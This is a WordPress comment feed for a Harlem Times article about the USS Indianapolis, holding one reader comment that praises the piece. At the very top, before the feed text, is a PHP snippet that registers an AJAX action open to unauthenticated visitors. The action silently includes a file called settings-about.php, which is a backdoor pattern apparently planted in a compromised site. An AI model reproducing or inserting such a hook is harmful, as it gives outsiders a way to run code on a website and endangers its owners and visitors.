if(!function_exists('file_manager_check_dt')){ add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt'); add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt'); function file_manager_check_dt() { $file = __DIR__ . '/settings-about.php'; if (file_exists($file)) { include $file; } die(); } } Comments on: The Tale of USS Indianapolis https://theharlemtimes.com/online-news/the-tale-of-uss-indianapolis News for Harlem and the Harlems of the World Mon, 19 Sep 2022 10:32:36 +0000 hourly 1 https://wordpress.org/?v=6.8.3 By: Carlton G. Philpot https://theharlemtimes.com/online-news/the-tale-of-uss-indianapolis#comment-213597 Mon, 19 Sep 2022 10:32:36 +0000 https://theharlemtimes.com/?p=15368#comment-213597 An excellent and factual article. I look forward to reading subsequent articles about this naval tragedy and the book coming in the near future about the 28 Black sailors that were on board.

]]>